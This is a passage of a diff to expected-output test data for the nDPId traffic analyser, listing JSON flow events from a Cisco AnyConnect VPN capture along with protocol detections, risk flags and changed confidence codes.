-00907{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687245379,"flow_last_seen":1569687245725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8058,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00908{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1569687245688,"flow_last_seen":1569687268830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22452,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-01030{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1569687267035,"flow_last_seen":1569687288923,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21688,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00907{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687245379,"flow_last_seen":1569687245725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8058,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00908{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1569687245688,"flow_last_seen":1569687268830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22452,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+01030{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1569687267035,"flow_last_seen":1569687288923,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21688,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -374,39 +375,39 @@ 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569687269561,"flow_last_seen":1569687269570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1195,"flow_tot_l4_payload_len":1446,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} -00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687246982,"flow_last_seen":1569687272377,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00927{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1569687269562,"flow_last_seen":1569687273580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1140,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569687269561,"flow_last_seen":1569687269570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1195,"flow_tot_l4_payload_len":1446,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1569687246982,"flow_last_seen":1569687272377,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00927{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1569687269562,"flow_last_seen":1569687273580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1140,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569687269094,"flow_last_seen":1569687286632,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569687269094,"flow_last_seen":1569687286632,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1569687256018,"flow_last_seen":1569687267492,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":787,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569687256018,"flow_last_seen":1569687267492,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":787,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
